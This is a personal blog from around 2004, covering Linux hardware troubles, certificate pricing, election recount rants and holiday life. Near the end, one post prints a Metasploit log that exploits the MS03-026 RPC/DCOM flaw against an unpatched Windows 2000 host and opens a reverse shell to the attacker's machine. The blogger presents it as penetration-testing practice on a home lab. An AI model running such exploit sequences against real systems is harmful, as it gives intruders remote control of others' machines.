/dev/null

I saw this article on Slashdot and it really struck a chord. This “Internet A.D.D.” is something that I’ve been personally struggling with lately. For example, one of my previous rants was my frustration with my parents dial-up connection. I can’t be bothered to wait 10 WHOLE SECONDS for a web page to load! And I’ve certainly noticed (especially at work) that I can’t keep on task. I takes all I have to keep from clicking on the Thunderbird “new email message.” Even if I do make a conscious decision to ignore the email, it eats at me until I finally give in and switch over to my email client…seriously, I’m pathetic.

Here’s a snippet that I particularly like. This is in reference to the dopamine release when we’re excited by something new…

–snip–
We have so many options, reward centers that we never had before,” says John Ratey, who teaches at Harvard and is a psychiatrist specializing in attention deficit disorder. “I think that’s why we’re seeing more of this. There are more demands on our attention and less training for us to stop and take it all in. We seem to be amazing ourselves to death.”
–snip–

Anyway, give the article a read. It’s very well written and challenges some of the trends that us technology geeks are so proud of.

Life Inter Rupted

It’s the last day of the work week so I’m doing an anti-rant today. I’m looking forward to 8 hours of web surfing and LDAP/Samba setup so it should be a good day. Then I’m going to sleep to get ready for a fun weekend in Fargo. Short weeks are great!

wow, I just spent about 4 hours troubleshooting a problem with our webmail system. I emerged a new version a few days ago and broke it I guess. I changed a zillion things, restored from a backup all to find out that my problem was simply and old cookie sitting in my browser! AAAAAAHHHHHHHHH! Why didn’t I think of that first!?

So I bought a linksys USB (WUSB12) wireless device about a week ago at CompUSA. Aaron (guy I’m doing linux work for) was going to use it in his mini-ITX demo boxes so he could walk into a clients office and connect over an Ad-Hoc network. Initially, he installed a PCI card but it was a broadcom chipset that doesn’t work in linux (unless you use ndiswrapper…which is a pain). So anyway, I bought the linksys device and it worked (a little buggy) on Fedora Core 2 (2.6.9 kernel). Aaron then asked me to buy another one. So I figured I’d stop by CompUSA and pick up another one for the second machine. Of course, nothing is going right for me lately so it makes sense that CompUSA no longer sells that product! Ok, keep cool, Pete…just go to Best Buy. So I walk into BBY and get the half-hearted, I’m-required-to-say-hello-to-every-customer “hello” from BBY security guy…err…greeter. I ignore him and quickly go to the back of the store hoping to avoid all the other idiot shoppers who for some reason are _still_ shopping after Christmas. Of course, BBY no longer carries the product either. So I decided to purchase a Netgear product with a similar form factor. Only, I get home to find out that doesn’t work in linux…crap. I called a couple more places and had absolutely no luck. So I went to Circuit City today and bought another netgear (802.11b instead of 802.11g this time). I get to work and what do you know? There’s a bug in the 2.6.9 EHCI driver and this card doesn’t work either! AHHHH. I feel like i’m taking CRAZY PILLS or something. Anyway, I think I found a workaround by disabling EHCI and just using the OHCI/UHCI drivers instead. This whole ordeal which should have taken 30 minutes start to finish has now taken many hours of time and I’m frustrated.

I made up my mind. I’m going to Fargo for new Years. I talked to Jester and he’s going to be around as well so it should be a good time Now I just need to make it through 3 MORE DAYS!

I saw this on the MozillaZine blog and thought it was pretty clever:

Voting Problems Strike Mozilla Firefox 1.0/US Presidential Elections Poll

The latest MozillaZine poll has been plagued by voting problems, according to vote officials. The poll, which asked readers of the popular online journal to state whether the success of Mozilla Firefox 1.0 or the outcome of the US Presidential Election is more important to them, was originally very close, with just a few percentage points between the two choices. However, a few weeks ago, the second option, ‘My preferred candidate winning the US Presidential Election’, seemed to lose several thousand votes. “We’re not sure what happened,” explained MozillaZine administrator Alex Bishop, “the votes appear to have just vanished.” As voters were not given paper receipts, Bishop admitted that there is no way to perform a manual recount.

Critics have long contended that the electronic voting system used was inadequately tested. Others have noted potential conflicts of interest. “It’s well known that MozillaZine has strong links with the developers of Mozilla Firefox,” said one expert, speaking on the condition of anonymity. “In fact, some of the administrators have made financial donations to the Firefox marketing campaign. Then all of a sudden, there’s this mysterious error that swings the vote massively in favour of the Firefox option. Shouldn’t we be suspicious?” MozillaZine officials acknowledged the links with Firefox but claimed this did not affect the fairness of the vote. “We just don’t know what happened,” said Bishop.

For our next poll, we’re going to move on to browser usage statistics, another famously imprecise area. The Mozilla Foundation has said that it wants a ten percent usage share for Firefox by the end of 2005. We want to know if you think this figure will be achieved. Place your vote and then check the results to see if others think the ten percent target will be reached.

I uploaded the pictures I took while I was at home for Christmas. Here’s the link:

Christmas 2004

I just got home after a nice long drive. The time passed extremely quickly though. I guess time flies when you’re reading about writing exploit/socket code in assembly language Christmas was good. We made it through the entire weekend without any major family conflicts…though there were MANY small ones.

I stopped by Tristan and Sarah’s last night (for about 1.5hrs) and had a really good time. Larry and Dru were there too so we all “chilled” and watched part of Napolean Dynamite (the “Napolean Rocks Out” scene). It turns out Tristan got 3 copies of that movie for Christmas and would have gotten 4 if Kev hadn’t realized that _someone_ would give him that movie.

Anyway, it’s great to be home and sitting in front of my G5 again. I think I love my computer a little too much

So does anyone have any exciting new years plans? Word on the street is that there’s a Wookie gathering in Fargo on New Years Eve. Methinks I should attend…I’ll post when I make a decision for sure.

Well, I’m back at my dad’s office again. Stupid # @*%^@ @#*&% usb drive is broken so the file I downloaded didn’t show up when I got home….now I’m pissed. I need to go home…SOON so I can chill. Maybe I’ll get to see Tristan and Sarah tonight…that would make things better

Well, I’m up in the frozen tundra of Roseau, MN. Wow, it’s freakin’ cold here. My rant for today is simple. Why are my parents still using dialup internet access!? For crying out loud, in a community of 2500 people, they have 2, count it, 2 high speed options which are both cheaper than what I have in Minneapolis. The local cableco has provided cable data service for about 2 years now at 29.95/month. There’s also a fixed wireless provider that runs about $35/month. But, my stubborn father insists that dialup is all they need and doesn’t seem willing to spend the extra $15 or so per month to get a decent connection.

I wanted to download iTunes today to show my bro and to rip a few CDs. Of course, I’m pretty impatient and a 21 meg download at 2.4KB/s is enough to drive any geek insane. Thankfully, I was able to jump in the car, drive across town, and go to my dad’s office where they have a fixed wireless service. 80KB/s is _much_ better. Well, my download finished so I should get going.

Christmas with the family was a good time but I’m looking forward to getting home. Thankfully, the new book I bought is helping to pass the time. Gray Hat Hacking: The Ethical Hacker’s Handbook

Well, it’s time to hit the road for the fun 6+ hour drive home. Merry Christmas to all!

Today’s rant is in regards to the Ohio recount. First off, I have to admit I haven’t kept very good tabs on this…Mahlberg mentioned a story he read on Democracy Now so I decided to do some research. I found a particularly interesting story from some Green Party members from Minnesota who volunteered to be observers in Ohio. What absolutely blows my mind is that once again, the Secretary of State (who’s a responsible for the entire voting process, including the recount) is Ken Blackwell, a Republican. Hmm…this sounds like 4 years ago when Katherine Harris (Bush’s Florida campaign co-chair) was in charge of the Florida recount debacle! But Ken Blackwell is no ordinary republican. He’s a member of the Council on Foreign Relations who’s charter is to “spread democracy throughout the world”. Except, “spread democracy” is a loosely interpreted phrase. Maybe “help elect pro-business, pro-globalization, pro-American leaders” would be more honest. I know that by law, the Secretary of State is in charge of the recount, but this just seems like a recipe for disaster.

One more interesting point in the article. One of the eVoting machines that was chosen to audited had apparently been “patched” immediately after the election. From the article…”The reason that there had been a “test run” done Nov 14th was that there had been a new chip placed in the machine at this date.” Oh, a new chip huh? Yeah, I’m glad a new chip was put in AFTER the election but BEFORE a recount. WHY!?!?

Ok, end rant. While I don’t expect the recount to change much of anything, I’m glad it’s happening. These eVoting machines are a joke and the public needs to demand a system with a suitable paper audit trail. Not a system based on closed source, Microsoft Access, and central tabulators that use Microsoft remote access (unpatched, with public vulnerabilities) to run our elections.

Here are a few links. The first is the IndyMedia post.
Indy Media Green Party Ohio Recount Report
Wired news story about recount
BlackBoxVoting.org
watch the Votergate short film

In the first installment of Pete’s Rand Of The Day, I’d like to discuss SSL certificates. Now, I’m not a complete idiot when it comes to SSL. I understand the encryption technology, Certificate Authorities, chains of trust, etc so I _assumed_ buying a certificate would be easy. So I go to Verisign to check out prices and I’m thoroughly “shocked-and-awed.” Here are some of the things that upset me:

1. First off, _why_ is Verisign still selling 40-bit certs!? Are people really still using browsers limited to 40-bit encryption? The laws against exporting strong encryption are finally gone (thank goodness, those were a joke) so why would a company even allow a browser with 40-bit SSL to connect to their servers?
2. Verisign wants me to pay $895.00 per YEAR for a cert!? This is just ridiculous. So, I pay you $895.00 to verify that yes, Company X does in fact own the domain companyx.com and Company X does in fact exist and what I get in return is a signed certificate and a “Verisign approved” graphic to put on my website? Seriously, most users don’t even know if they’re visiting an SSL site, much less take the time to view the certificate and possibly even look for a “Verisign approved” graphic. And even if they did look for the graphic, how hard would that be to spoof?
3. After deciding to never pay a cent Verisign , I decided to check out what Thawte had to offer. At least their prices are more reasonable ($199.00/year) but I still had to dig to figure out the differences in their SSL offerings. Why can’t they just say something like “This more expensive certificate offers little extra value. However, your customers will feel more comfortable knowing that your company does, in fact, exist. Although, 99% of users haven’t a clue what SSL even is, so don’t bother wasting your hard earned money and buy the cheaper cert”. I guess that last sentence demonstrates why I’ll always be an IT guy and never a sales/marketing loser (I expect someone to “take care of me” if that ever transpires…I’m lookin’ at you PedXing).
4. I still had one unanswered question so I decided to try the “Live Online Chat” feature at Thawte. A window pops up, java applet loads, and I click connect…and wait…and wait…and eventually nothing happens and I’m back where I started. Ok, maybe it’s a problem with Firefox…I’ll bite the bullet and click “View this page in IE” in Firefox. Once again the same thing happens. Screw it! This is stupid. I quit.

whew, I feel better now…yet one more example of the idiocy of the sales/marketing folks at these two companies.

Since there’s only 2 days left until Christmas, I’ve decided to finally concede that it _is_ in fact winter. It’s been really cold here but the shock to my system has actually been quite nice

I’m headed up north on Thursday night to see the family for the weekend. It’ll be a fun time, but I’m not looking forward to the 6 hour drive, that’s for sure. Oh well, I think my sister is coming with and we’re picking up my bro in Bemidji so at least I’ll have some company to keep me awake. It’s been a long week so far. I spent most of Monday night messing around with buffer overflow exploits and trying to learn/re-learn intel assembly. Maybe I should have attended my undergrad assembly course more often instead of skipping out to play hacky sack… Last night I ended up going over to Aaron’s house to finish up some consulting work. Once again, I was there until after midnight. Thankfully the bosses are gone today so it’s quiet in the office.

Hope everyone has a great Christmas!

I’ve spent some time the last few days playing around with the metasploit framework. It’s an amazing tool for penetration testing. It comes bundled with a few well known (old) exploits, but more importantly, has a set of standardized payloads that one can execute after exploiting a machine. This is a fantastic tool and I’ll post more info about in another time. Here’s a quick log that shows how easy it is to exploit an unpatched win2k box using a msprc_dcom exploit: More info at Flyhouse Wiki

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026(win32_bind_stg_upexec) > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default         Description
  --------    ------    ------------    ------------------
  required    RHOST     192.168.1.24    The target address
  required    RPORT     135             The target port

  Payload:    Name        Default         Description
  --------    --------    ------------    ------------------------------------------
  optional    EXITFUNC    seh             Exit technique: "process", "thread", "seh"
  required    LHOST       192.168.1.25    Local address to receive connection
  required    LPORT       4444            Local port to receive connection

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.1.24
RHOST -> 192.168.1.24
msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.1.25
LHOST -> 192.168.1.25
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Connected to REMACT with group ID 0x99c0
[*] Got connection from 192.168.1.24:1034

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:WINNTsystem32>

I just signed up for a hosting plan at DreamHost so I decided to get this blog up and running again. Now, if I can only get into a routine of posting here a bit more often. Maybe if I spent more time in RealLife ™ and less time in from of my computer, I’d have some more interesting stories to tell.